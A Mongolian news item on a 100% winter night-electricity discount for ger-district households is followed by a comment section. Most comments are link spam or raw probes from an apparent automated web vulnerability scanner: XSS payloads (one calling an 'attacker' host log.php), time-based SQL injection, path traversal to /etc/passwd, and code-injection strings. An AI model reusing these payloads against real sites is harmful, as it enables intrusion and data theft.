Гэр хорооллын айл өрхийн шөнийн цахилгааны төлбөрийг ирэх сарын нэгнээс 100 хувь хөнгөлнө

Aдмин / Нийгэм

Нийслэлийн гэр хорооллын 117 мянга, аймаг, орон нутгийн 72 мянган айл өрхийн шөнийн цахилгааны төлбөрийг ирэх сарын нэгнээс 100 хувиар хөнгөлнө.

Энэ нь агаарын бохирдлыг бууруулахын тулд гэр хорооллын айл өрхүүдийг цахилгаанаар халаалт, дулаанаа шийдэхийг дэмжих нэг алхам юм.

Энэ жилийн хөнгөлөлтөд гэр хорооллын 189 мянган айл өрх хамрагдаж, үүнд 4,7 тэрбум төгрөгийн хөнгөлөлт үзүүлэхээр төлөвлөжээ. Хөнгөлөлт 11 дүгээр сарын 1-нээс ирэх оны дөрөвдүгээр сарын 1 хүртэл хугацаанд үдшийн 21.00 цагаас өглөөний 06.00 цагийн хооронд үйлчилнэ.


Сэтгэгдэл

rqigcjotk [222.161.241.76] 2021-12-24 01:59:37

Мэдээ.МН rqigcjotk http://www.gr7sy1846k7y3ox385u5oll71z3z7qr4s.org/ [url=http://www.gr7sy1846k7y3ox385u5oll71z3z7qr4s.org/]urqigcjotk[/url] <a href="http://www.gr7sy1846k7y3ox385u5oll71z3z7qr4s.org/">arqigcjotk</a>

tfmkpylfw [101.64.137.170] 2021-07-31 10:59:46

Мэдээ.МН [url=http://www.g09d6bn8jx39ca9ck3i0tj2tgr456476s.org/]utfmkpylfw[/url] <a href="http://www.g09d6bn8jx39ca9ck3i0tj2tgr456476s.org/">atfmkpylfw</a> tfmkpylfw http://www.g09d6bn8jx39ca9ck3i0tj2tgr456476s.org/

lxkzfshlyk [124.89.227.177] 2021-07-23 20:56:39

Мэдээ.МН [url=http://www.g0z8gwv6hlyu4yw0t8061c09l70k180xs.org/]ulxkzfshlyk[/url] <a href="http://www.g0z8gwv6hlyu4yw0t8061c09l70k180xs.org/">alxkzfshlyk</a> lxkzfshlyk http://www.g0z8gwv6hlyu4yw0t8061c09l70k180xs.org/

cvnqyoson [120.132.122.228] 2021-06-22 07:10:01

Мэдээ.МН cvnqyoson http://www.gr2ubqbhz6r30g21x88j54c884l8g82hs.org/ <a href="http://www.gr2ubqbhz6r30g21x88j54c884l8g82hs.org/">acvnqyoson</a> [url=http://www.gr2ubqbhz6r30g21x88j54c884l8g82hs.org/]ucvnqyoson[/url]

kjolqqcjg [14.204.20.205] 2021-03-23 13:28:45

Мэдээ.МН kjolqqcjg http://www.g03cer1791vdonwf8nf374zj7m58476ds.org/ [url=http://www.g03cer1791vdonwf8nf374zj7m58476ds.org/]ukjolqqcjg[/url] <a href="http://www.g03cer1791vdonwf8nf374zj7m58476ds.org/">akjolqqcjg</a>

koppvqrcz [123.189.92.206] 2021-03-19 13:28:33

Мэдээ.МН [url=http://www.g31159pta4xy5gc0501g7c1r7ef1tn5js.org/]ukoppvqrcz[/url] koppvqrcz http://www.g31159pta4xy5gc0501g7c1r7ef1tn5js.org/ <a href="http://www.g31159pta4xy5gc0501g7c1r7ef1tn5js.org/">akoppvqrcz</a>

hpyyjcxbfh [221.155.42.35] 2021-03-18 01:57:39

Мэдээ.МН [url=http://www.gih4f39425336qq4i0v5pkbeeo8c76v5s.org/]uhpyyjcxbfh[/url] hpyyjcxbfh http://www.gih4f39425336qq4i0v5pkbeeo8c76v5s.org/ <a href="http://www.gih4f39425336qq4i0v5pkbeeo8c76v5s.org/">ahpyyjcxbfh</a>

rbzbmvoj [42.6.109.243] 2021-03-17 13:09:55

Мэдээ.МН <a href="http://www.g7mu69k17710o0t65w4eedlp6q85j1hrs.org/">arbzbmvoj</a> [url=http://www.g7mu69k17710o0t65w4eedlp6q85j1hrs.org/]urbzbmvoj[/url] rbzbmvoj http://www.g7mu69k17710o0t65w4eedlp6q85j1hrs.org/

sfylnxkrg [183.225.249.209] 2021-03-13 11:39:22

Мэдээ.МН [url=http://www.g9088gj7xzq9w0xj010psy2x5q498v2gs.org/]usfylnxkrg[/url] <a href="http://www.g9088gj7xzq9w0xj010psy2x5q498v2gs.org/">asfylnxkrg</a> sfylnxkrg http://www.g9088gj7xzq9w0xj010psy2x5q498v2gs.org/

mdjxmifjj [36.37.124.100] 2021-02-08 11:48:16

Мэдээ.МН <a href="http://www.g8ku9780ze5ode5h34r1100947vvfnpqs.org/">amdjxmifjj</a> mdjxmifjj http://www.g8ku9780ze5ode5h34r1100947vvfnpqs.org/ [url=http://www.g8ku9780ze5ode5h34r1100947vvfnpqs.org/]umdjxmifjj[/url]

ncsinzcg [110.191.212.248] 2021-01-29 00:13:59

Мэдээ.МН <a href="http://www.g2eujj0qm21ja4l1t377h17ne00j97v5s.org/">ancsinzcg</a> ncsinzcg http://www.g2eujj0qm21ja4l1t377h17ne00j97v5s.org/ [url=http://www.g2eujj0qm21ja4l1t377h17ne00j97v5s.org/]uncsinzcg[/url]

rftzijbdrf [116.0.1.138] 2021-01-15 03:35:41

Мэдээ.МН <a href="http://www.g5mjr2a5b89c0dadhd98q65v5nz66245s.org/">arftzijbdrf</a> rftzijbdrf http://www.g5mjr2a5b89c0dadhd98q65v5nz66245s.org/ [url=http://www.g5mjr2a5b89c0dadhd98q65v5nz66245s.org/]urftzijbdrf[/url]

escvymqlfh [113.108.127.23] 2021-01-08 01:56:26

Мэдээ.МН <a href="http://www.gv7qw6c750268795d2rwm3j0n7y5sczrs.org/">aescvymqlfh</a> [url=http://www.gv7qw6c750268795d2rwm3j0n7y5sczrs.org/]uescvymqlfh[/url] escvymqlfh http://www.gv7qw6c750268795d2rwm3j0n7y5sczrs.org/

wmsfqviwsg [113.108.127.23] 2021-01-08 01:56:26

Мэдээ.МН [url=http://www.g835twy69dw1wh28ta5n98is65k09ep5s.org/]uwmsfqviwsg[/url] <a href="http://www.g835twy69dw1wh28ta5n98is65k09ep5s.org/">awmsfqviwsg</a> wmsfqviwsg http://www.g835twy69dw1wh28ta5n98is65k09ep5s.org/

zorjksifj [61.142.20.5] 2020-12-30 01:52:21

Мэдээ.МН [url=http://www.g2ok6y574uikf2oct0k712u2xl24746fs.org/]uzorjksifj[/url] <a href="http://www.g2ok6y574uikf2oct0k712u2xl24746fs.org/">azorjksifj</a> zorjksifj http://www.g2ok6y574uikf2oct0k712u2xl24746fs.org/

jdqglib [180.189.191.27] 2020-12-15 01:48:06

Мэдээ.МН jdqglib http://www.g3n2ew90w9mmb3pil9485g0x9c43xe34s.org/ <a href="http://www.g3n2ew90w9mmb3pil9485g0x9c43xe34s.org/">ajdqglib</a> [url=http://www.g3n2ew90w9mmb3pil9485g0x9c43xe34s.org/]ujdqglib[/url]

hnedkiloo [119.135.103.239] 2020-12-05 06:57:20

Мэдээ.МН [url=http://www.g11xzo6s68c172j4kf74x5r4t8prg1i7s.org/]uhnedkiloo[/url] <a href="http://www.g11xzo6s68c172j4kf74x5r4t8prg1i7s.org/">ahnedkiloo</a> hnedkiloo http://www.g11xzo6s68c172j4kf74x5r4t8prg1i7s.org/

scvvnpezsj [113.72.120.144] 2020-12-03 12:29:53

Мэдээ.МН scvvnpezsj http://www.gl950ci48524t6hibv2q91s37v1fj8mws.org/ <a href="http://www.gl950ci48524t6hibv2q91s37v1fj8mws.org/">ascvvnpezsj</a> [url=http://www.gl950ci48524t6hibv2q91s37v1fj8mws.org/]uscvvnpezsj[/url]

ngzipedbq [36.37.124.100] 2020-12-03 04:56:03

Мэдээ.МН ngzipedbq http://www.g4183pc49an797v21lz3btz3zjf7zx30s.org/ [url=http://www.g4183pc49an797v21lz3btz3zjf7zx30s.org/]ungzipedbq[/url] <a href="http://www.g4183pc49an797v21lz3btz3zjf7zx30s.org/">angzipedbq</a>

onpwbxdoc [119.114.7.121] 2020-12-03 02:55:51

Мэдээ.МН [url=http://www.gsp3wg762pzd98245sy1ey17g5366tkds.org/]uonpwbxdoc[/url] <a href="http://www.gsp3wg762pzd98245sy1ey17g5366tkds.org/">aonpwbxdoc</a> onpwbxdoc http://www.gsp3wg762pzd98245sy1ey17g5366tkds.org/

lbzmfdzdyv [121.129.100.72] 2020-12-01 09:08:35

Мэдээ.МН lbzmfdzdyv http://www.g01oar54fg6o2nd0r6mmm29i56xf3416s.org/ [url=http://www.g01oar54fg6o2nd0r6mmm29i56xf3416s.org/]ulbzmfdzdyv[/url] <a href="http://www.g01oar54fg6o2nd0r6mmm29i56xf3416s.org/">albzmfdzdyv</a>

ookzzrtpdl [36.37.124.100] 2020-12-01 08:12:58

Мэдээ.МН ookzzrtpdl http://www.g800jdjiq4k5g94xs23dx122h6re363ts.org/ [url=http://www.g800jdjiq4k5g94xs23dx122h6re363ts.org/]uookzzrtpdl[/url] <a href="http://www.g800jdjiq4k5g94xs23dx122h6re363ts.org/">aookzzrtpdl</a>

ovqboclmp [101.64.107.220] 2020-12-01 03:26:57

Мэдээ.МН ovqboclmp http://www.gpojh960gy7tjbfx567580dk405c09d1s.org/ <a href="http://www.gpojh960gy7tjbfx567580dk405c09d1s.org/">aovqboclmp</a> [url=http://www.gpojh960gy7tjbfx567580dk405c09d1s.org/]uovqboclmp[/url]

zzpbzemn [49.50.28.155] 2020-11-29 22:47:47

Мэдээ.МН zzpbzemn http://www.gik05016zalrv846o3byih59k4q8a838s.org/ [url=http://www.gik05016zalrv846o3byih59k4q8a838s.org/]uzzpbzemn[/url] <a href="http://www.gik05016zalrv846o3byih59k4q8a838s.org/">azzpbzemn</a>

dtnknmxct [223.75.175.52] 2020-11-27 14:56:02

Мэдээ.МН <a href="http://www.gc9yp06jtag4r8h2aj9v66wk5995r400s.org/">adtnknmxct</a> [url=http://www.gc9yp06jtag4r8h2aj9v66wk5995r400s.org/]udtnknmxct[/url] dtnknmxct http://www.gc9yp06jtag4r8h2aj9v66wk5995r400s.org/

nmqqzyin [113.72.121.121] 2020-11-26 16:15:33

Мэдээ.МН [url=http://www.gv2ib32210m7388lf2194n9ki3hgykcus.org/]unmqqzyin[/url] nmqqzyin http://www.gv2ib32210m7388lf2194n9ki3hgykcus.org/ <a href="http://www.gv2ib32210m7388lf2194n9ki3hgykcus.org/">anmqqzyin</a>

liphevpkjb [36.37.124.100] 2020-11-26 06:48:10

Мэдээ.МН [url=http://www.g556c32qi5s6gsxk8czm051375i0vru9s.org/]uliphevpkjb[/url] liphevpkjb http://www.g556c32qi5s6gsxk8czm051375i0vru9s.org/ <a href="http://www.g556c32qi5s6gsxk8czm051375i0vru9s.org/">aliphevpkjb</a>

ttwixkqyo [116.22.4.203] 2020-11-25 07:06:39

Мэдээ.МН <a href="http://www.g6as1698525bj8egas5028rk74dalzb2s.org/">attwixkqyo</a> ttwixkqyo http://www.g6as1698525bj8egas5028rk74dalzb2s.org/ [url=http://www.g6as1698525bj8egas5028rk74dalzb2s.org/]uttwixkqyo[/url]

vsymjnrf [113.251.25.200] 2020-11-23 10:15:10

Мэдээ.МН [url=http://www.g40ms901e67yz6775a4vn608l2halepls.org/]uvsymjnrf[/url] <a href="http://www.g40ms901e67yz6775a4vn608l2halepls.org/">avsymjnrf</a> vsymjnrf http://www.g40ms901e67yz6775a4vn608l2halepls.org/

kwpqbmdkx [61.180.184.214] 2020-11-22 20:30:42

Мэдээ.МН kwpqbmdkx http://www.g006b4512p0vh15lw4kuvwwe77x4it66s.org/ [url=http://www.g006b4512p0vh15lw4kuvwwe77x4it66s.org/]ukwpqbmdkx[/url] <a href="http://www.g006b4512p0vh15lw4kuvwwe77x4it66s.org/">akwpqbmdkx</a>

nmgbxfprxl [202.78.232.138] 2020-11-17 15:19:42

Мэдээ.МН <a href="http://www.gah860r4738mvg5h236vvd1c8ztg0p83s.org/">anmgbxfprxl</a> nmgbxfprxl http://www.gah860r4738mvg5h236vvd1c8ztg0p83s.org/ [url=http://www.gah860r4738mvg5h236vvd1c8ztg0p83s.org/]unmgbxfprxl[/url]

cebvxsyljg [210.112.95.223] 2020-11-14 12:53:25

Мэдээ.МН cebvxsyljg http://www.gh1t652q5399738go8r9bg0mstwrf21ms.org/ [url=http://www.gh1t652q5399738go8r9bg0mstwrf21ms.org/]ucebvxsyljg[/url] <a href="http://www.gh1t652q5399738go8r9bg0mstwrf21ms.org/">acebvxsyljg</a>

rmxpknneso [61.180.184.214] 2020-11-13 16:49:46

Мэдээ.МН [url=http://www.gd4biy997g3498hhn58byo417r5fsi94s.org/]urmxpknneso[/url] <a href="http://www.gd4biy997g3498hhn58byo417r5fsi94s.org/">armxpknneso</a> rmxpknneso http://www.gd4biy997g3498hhn58byo417r5fsi94s.org/

qzypzcvk [60.219.133.38] 2020-11-13 09:25:44

Мэдээ.МН <a href="http://www.gu85cg9k3518o56r8n94zj6mf30h1vpts.org/">aqzypzcvk</a> qzypzcvk http://www.gu85cg9k3518o56r8n94zj6mf30h1vpts.org/ [url=http://www.gu85cg9k3518o56r8n94zj6mf30h1vpts.org/]uqzypzcvk[/url]

wwjcfqtyq [36.37.124.100] 2020-11-09 09:12:17

Мэдээ.МН [url=http://www.gijb35n4072cd94oo6rrq2o0x63499rqs.org/]uwwjcfqtyq[/url] wwjcfqtyq http://www.gijb35n4072cd94oo6rrq2o0x63499rqs.org/ <a href="http://www.gijb35n4072cd94oo6rrq2o0x63499rqs.org/">awwjcfqtyq</a>

ttspykenkf [203.189.141.214] 2020-11-09 02:37:15

Мэдээ.МН <a href="http://www.g9yh6p5j9u71z808bcf0x725seqpo062s.org/">attspykenkf</a> ttspykenkf http://www.g9yh6p5j9u71z808bcf0x725seqpo062s.org/ [url=http://www.g9yh6p5j9u71z808bcf0x725seqpo062s.org/]uttspykenkf[/url]

etirfsmhog [112.81.164.209] 2020-11-04 04:23:37

Мэдээ.МН [url=http://www.gy9bal47j6825d39e8k2nvdvy3p68n03s.org/]uetirfsmhog[/url] etirfsmhog http://www.gy9bal47j6825d39e8k2nvdvy3p68n03s.org/ <a href="http://www.gy9bal47j6825d39e8k2nvdvy3p68n03s.org/">aetirfsmhog</a>

sdzlhhlz [112.81.164.209] 2020-11-04 04:21:57

Мэдээ.МН <a href="http://www.gdwbawyhdo3035725ml42zj698s66z27s.org/">asdzlhhlz</a> [url=http://www.gdwbawyhdo3035725ml42zj698s66z27s.org/]usdzlhhlz[/url] sdzlhhlz http://www.gdwbawyhdo3035725ml42zj698s66z27s.org/

twlcwjypjg [223.151.126.199] 2020-11-03 23:41:13

Мэдээ.МН twlcwjypjg http://www.g7mnt0514koede4z81ol72e825du1v23s.org/ [url=http://www.g7mnt0514koede4z81ol72e825du1v23s.org/]utwlcwjypjg[/url] <a href="http://www.g7mnt0514koede4z81ol72e825du1v23s.org/">atwlcwjypjg</a>

sljcjlyfm [113.106.250.155] 2020-11-01 08:59:28

Мэдээ.МН sljcjlyfm http://www.g01lb0zio7a500m0g399zb2s8242qahds.org/ [url=http://www.g01lb0zio7a500m0g399zb2s8242qahds.org/]usljcjlyfm[/url] <a href="http://www.g01lb0zio7a500m0g399zb2s8242qahds.org/">asljcjlyfm</a>

e [116.113.93.82] 2020-10-28 22:22:11

1

e [116.113.93.82] 2020-10-28 22:22:09

1<Vc8ZOv<

e [116.113.93.82] 2020-10-28 22:22:06

1<img sRc='http://attacker-9234/log.php?

e [116.113.93.82] 2020-10-28 22:22:02

1<I6sK3E x=9601>

e [116.113.93.82] 2020-10-28 22:21:59

1<ifRAme sRc=9638.com></IfRamE>

e [116.113.93.82] 2020-10-28 22:21:54

1<WTJJY0>1NSFU[!+!]</WTJJY0>

e [116.113.93.82] 2020-10-28 22:21:51

108p4d <ScRiPt >iLhu(9151)</ScRiPt>

e [116.113.93.82] 2020-10-28 22:21:47

1<% contenteditable onresize=iLhu(9159)>

e [116.113.93.82] 2020-10-28 22:21:45

1}body{acu:Expre/**/SSion(iLhu(9098))}

e [116.113.93.82] 2020-10-28 22:21:41

1<img<!-- --> src=x onerror=alert(9974);//><!-- -->

e [116.113.93.82] 2020-10-28 22:21:38

[url=http://www.vulnweb.com][/url]

e [116.113.93.82] 2020-10-28 22:21:35

<a HrEF=jaVaScRiPT:>

e [116.113.93.82] 2020-10-28 22:21:32

<a HrEF=http://www.vulnweb.com></a>

e [116.113.93.82] 2020-10-28 22:21:27

1<input autofocus onfocus=iLhu(9831)>

e [116.113.93.82] 2020-10-28 22:21:21

e [116.113.93.82] 2020-10-28 22:21:18

1<ScRiPt>iLhu(9682)</sCripT>

e [116.113.93.82] 2020-10-28 22:21:15

1\u003CScRiPt\iLhu(9763)\u003C/sCripT\u003E

e [116.113.93.82] 2020-10-28 22:21:11

%31%3C%53%63%52%69%50%74%20%3E%69%4C%68%75%289728%29%3C%2F%73%43%72%69%70%54%3E

e [116.113.93.82] 2020-10-28 22:21:02

1<img/src=">" onerror=alert(9023)>

e [116.113.93.82] 2020-10-28 22:20:59

1<img src=xyz OnErRor=iLhu(9816)>

e [116.113.93.82] 2020-10-28 22:20:55

1<img src=//testasp.vulnweb.com/t/dot.gif onload=iLhu(9302)>

e [116.113.93.82] 2020-10-28 22:20:50

1<body onload=iLhu(9558)>

e [116.113.93.82] 2020-10-28 22:20:46

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9667'>

e [116.113.93.82] 2020-10-28 22:20:44

1<isindex type=image src=1 onerror=iLhu(9463)>

e [116.113.93.82] 2020-10-28 22:20:37

1<svg

e [116.113.93.82] 2020-10-28 22:20:35

1<video><source onerror="javascript:iLhu(9920)">

e [116.113.93.82] 2020-10-28 22:20:31

1<ScRiPt >iLhu(9177)</ScRiPt>

e [116.113.93.82] 2020-10-28 22:20:26

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9973></ScRiPt>

e [116.113.93.82] 2020-10-28 22:20:23

1<ScRiPt >iLhu(9419)</ScRiPt>

e [116.113.93.82] 2020-10-28 22:20:19

1<ScR<ScRiPt>IpT>iLhu(9774)</sCr<ScRiPt>IpT>

e [116.113.93.82] 2020-10-28 22:20:14

1<script>iLhu(9265)</script>

e [116.113.93.82] 2020-10-28 22:20:11

1<WVVSWG>SOV75[!+!]</WVVSWG>

e [116.113.93.82] 2020-10-28 22:20:06

1<ScRiPt >iLhu(9247)</ScRiPt>

e [116.113.93.82] 2020-10-28 22:20:03

{{10000484*9999836}}

e [116.113.93.82] 2020-10-28 22:19:57

acux5043

e [116.113.93.82] 2020-10-28 22:19:52

acu4400<s1﹥s2ʺs3ʹuca4400

e [116.113.93.82] 2020-10-28 22:19:49

19826486

e [116.113.93.82] 2020-10-28 22:19:44

'"()&%<acx><ScRiPt >iLhu(9318)</ScRiPt>

e [116.113.93.82] 2020-10-28 22:19:41

1'"()&%<acx><ScRiPt >iLhu(9959)</ScRiPt>

e [116.113.93.82<RGfwhU<] 2020-10-28 22:19:27

1

e [116.113.93.82<img sRc='http://attacker-9136/log.php?] 2020-10-28 22:19:19

1

e [116.113.93.82<ow3NIe x=9248>] 2020-10-28 22:19:15

1

e [116.113.93.82<ifRAme sRc=9957.com></IfRamE>] 2020-10-28 22:19:12

1

e [116.113.93.82<WJQUAS>NOJBJ[!+!]</WJQUAS>] 2020-10-28 22:19:09

1

e [116.113.93.82z9xtR <ScRiPt >iLhu(9722)</ScRiPt>] 2020-10-28 22:19:06

1

e [116.113.93.82<% contenteditable onresize=iLhu(9400)>] 2020-10-28 22:19:03

1

e [116.113.93.82}body{acu:Expre/**/SSion(iLhu(9574))}] 2020-10-28 22:19:00

1

e [116.113.93.82<img<!-- --> src=x onerror=alert(9801);//><!-- -->] 2020-10-28 22:18:56

1

e [[url=http://www.vulnweb.com][/url]] 2020-10-28 22:18:54

1

e [<a HrEF=jaVaScRiPT:>] 2020-10-28 22:18:50

1

e [<a HrEF=http://www.vulnweb.com></a>] 2020-10-28 22:18:47

1

e [116.113.93.82<input autofocus onfocus=iLhu(9926)>] 2020-10-28 22:18:44

1

e [] 2020-10-28 22:18:41

1

e [116.113.93.82<ScRiPt>iLhu(9432)</sCripT>] 2020-10-28 22:18:38

1

e [116.113.93.82\u003CScRiPt\iLhu(9016)\u003C/sCripT\u003E] 2020-10-28 22:18:35

1

e [%31%31%36%2E%31%31%33%2E%39%33%2E%38%32%3C%53%63%52%69%50%74%20%3E%69%4C%68%75%289627%29%3C%2F%73%43%72%69%70%54%3E] 2020-10-28 22:18:29

1

e [116.113.93.82<img/src=">" onerror=alert(9560)>] 2020-10-28 22:18:26

1

e [116.113.93.82<img src=xyz OnErRor=iLhu(9598)>] 2020-10-28 22:18:23

1

e [116.113.93.82<img src=//testasp.vulnweb.com/t/dot.gif onload=iLhu(9432)>] 2020-10-28 22:18:20

1

e [116.113.93.82<body onload=iLhu(9368)>] 2020-10-28 22:18:17

1

e [116.113.93.82<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9642'>] 2020-10-28 22:18:15

1

e [116.113.93.82<isindex type=image src=1 onerror=iLhu(9768)>] 2020-10-28 22:18:11

1

e [116.113.93.82<svg ] 2020-10-28 22:18:08

1

e [116.113.93.82<video><source onerror="javascript:iLhu(9270)">] 2020-10-28 22:18:06

1

e [116.113.93.82] 2020-10-28 22:18:06

1

e [116.113.93.82] 2020-10-28 22:18:05

WEB-INF\web.xml

e [116.113.93.82] 2020-10-28 22:18:05

1

e [116.113.93.82] 2020-10-28 22:18:04

7xVhXV8R'));select pg_sleep(9); --

e [116.113.93.82<ScRiPt >iLhu(9708)</ScRiPt>] 2020-10-28 22:18:03

1

e [116.113.93.82] 2020-10-28 22:18:03

dvWaOAn9');select pg_sleep(6); --

e [116.113.93.82] 2020-10-28 22:18:02

WEB-INF/web.xml

e [116.113.93.82] 2020-10-28 22:18:01

XyI2luGy';select pg_sleep(6); --

e [116.113.93.82] 2020-10-28 22:18:01

-1));select pg_sleep(3); --

e [116.113.93.82] 2020-10-28 22:18:00

/WEB-INF/web.xml

e [116.113.93.82<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9713></ScRiPt>] 2020-10-28 22:18:00

1

e [116.113.93.82] 2020-10-28 22:17:59

-1);select pg_sleep(3); --

e [116.113.93.82] 2020-10-28 22:17:59

/\../\../\../\../\../\../\../etc/passwd

e [116.113.93.82] 2020-10-28 22:17:58

-1;select pg_sleep(3); --

e [116.113.93.82] 2020-10-28 22:17:58

file:///etc/passwd

e [116.113.93.82<ScRiPt >iLhu(9022)</ScRiPt>] 2020-10-28 22:17:57

1

e [116.113.93.82] 2020-10-28 22:17:57

93lrNFWK'; waitfor delay '0:0:9' --

e [116.113.93.82] 2020-10-28 22:17:57

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

e [116.113.93.82] 2020-10-28 22:17:56

1 waitfor delay '0:0:9' --

e [116.113.93.82] 2020-10-28 22:17:56

-1); waitfor delay '0:0:6' --

e [116.113.93.82] 2020-10-28 22:17:55

-1; waitfor delay '0:0:6' --

e [116.113.93.82] 2020-10-28 22:17:55

..

e [116.113.93.82] 2020-10-28 22:17:54

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

e [116.113.93.82<ScR<ScRiPt>IpT>iLhu(9775)</sCr<ScRiPt>IpT>] 2020-10-28 22:17:53

1

e [116.113.93.82] 2020-10-28 22:17:53

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

e [116.113.93.82] 2020-10-28 22:17:53

0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z

e [116.113.93.82] 2020-10-28 22:17:52

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

e [116.113.93.82] 2020-10-28 22:17:51

/.././.././.././.././.././.././.././../etc/./passwd%00

e [116.113.93.82] 2020-10-28 22:17:50

0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z

e [116.113.93.82] 2020-10-28 22:17:50

%2fetc%2fpasswd

e [116.113.93.82] 2020-10-28 22:17:48

/etc/passwd

e [116.113.93.82] 2020-10-28 22:17:48

if(now()=sysdate(),sleep(9),0)

e [116.113.93.82] 2020-10-28 22:17:47

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

e [116.113.93.82<script>iLhu(9610)</script>] 2020-10-28 22:17:47

1

e [116.113.93.82] 2020-10-28 22:17:46

/../..//../..//../..//../..//../..//etc/passwd.jpg

e [116.113.93.82] 2020-10-28 22:17:46

-1" OR 2+177-177-1=0+0+0+1 --

e [116.113.93.82] 2020-10-28 22:17:46

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

e [116.113.93.82] 2020-10-28 22:17:45

../../../../../../../../../../etc/passwd.jpg

e [116.113.93.82<WCJN6S>SQGB9[!+!]</WCJN6S>] 2020-10-28 22:17:45

1

e [116.113.93.82] 2020-10-28 22:17:45

-1' OR 2+368-368-1=0+0+0+1 or 'SUQV2Z2J'='

e [116.113.93.82] 2020-10-28 22:17:44

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

e [116.113.93.82] 2020-10-28 22:17:44

-1' OR 2+331-331-1=0+0+0+1 --

e [116.113.93.82] 2020-10-28 22:17:42

-1 OR 2+422-422-1=0+0+0+1

e [116.113.93.82<ScRiPt >iLhu(9355)</ScRiPt>] 2020-10-28 22:17:42

1

e [116.113.93.82] 2020-10-28 22:17:42

../../../../../../../../../../../../../../../proc/version

e [116.113.93.82] 2020-10-28 22:17:41

-1 OR 2+735-735-1=0+0+0+1 --

e [116.113.93.82] 2020-10-28 22:17:41

../../../../../../../../../../etc/passwd

e [116.113.93.82] 2020-10-28 22:17:40

RTuqFS7f

e [116.113.93.82] 2020-10-28 22:17:39

e [{{10000235*9999927}}] 2020-10-28 22:17:39

1

e [116.113.93.82] 2020-10-28 22:17:38

1

e [116.113.93.82] 2020-10-28 22:17:38

e [116.113.93.82] 2020-10-28 22:17:37

JyI=

e [116.113.93.82] 2020-10-28 22:17:36

1

e [acux9673] 2020-10-28 22:17:36

1

e [116.113.93.82] 2020-10-28 22:17:36

@@cT9HW

e [116.113.93.82] 2020-10-28 22:17:34

1

e [116.113.93.82] 2020-10-28 22:17:33

\

e [acu9567<s1﹥s2ʺs3ʹuca9567] 2020-10-28 22:17:33

1

e [116.113.93.82] 2020-10-28 22:17:32

1'"

e [116.113.93.829498882] 2020-10-28 22:17:26

1

e [116.113.93.82] 2020-10-28 22:17:25

${@print(md5(acunetix_wvs_security_test))}\

e [116.113.93.82] 2020-10-28 22:17:24

create/.

e ['"()&%<acx><ScRiPt >iLhu(9052)</ScRiPt>] 2020-10-28 22:17:24

1

e [116.113.93.82] 2020-10-28 22:17:24

${@print(md5(acunetix_wvs_security_test))}

e [] 2020-10-28 22:17:24

1

e [116.113.93.82] 2020-10-28 22:17:23

create

e [116.113.93.82] 2020-10-28 22:17:23

";print(md5(acunetix_wvs_security_test));$a="

e [] 2020-10-28 22:17:22

1

e [116.113.93.82] 2020-10-28 22:17:22

';print(md5(acunetix_wvs_security_test));$a='

e [JyI=] 2020-10-28 22:17:21

1

e [116.113.93.82] 2020-10-28 22:17:21

;print(md5(acunetix_wvs_security_test));

e [116.113.93.82] 2020-10-28 22:17:21

<!--

e [116.113.93.82] 2020-10-28 22:17:20

create

e [116.113.93.82] 2020-10-28 22:17:20

testasp.vulnweb.com/t/xss.html?%00

e [116.113.93.82] 2020-10-28 22:17:20

/www.vulnweb.com

e [@@Bx5m9] 2020-10-28 22:17:20

1

e [116.113.93.82] 2020-10-28 22:17:20

'"

e [116.113.93.82] 2020-10-28 22:17:19

HttP://testasp.vulnweb.com/t/xss.html?%00

e [116.113.93.82'"()&%<acx><ScRiPt >iLhu(9335)</ScRiPt>] 2020-10-28 22:17:19

1
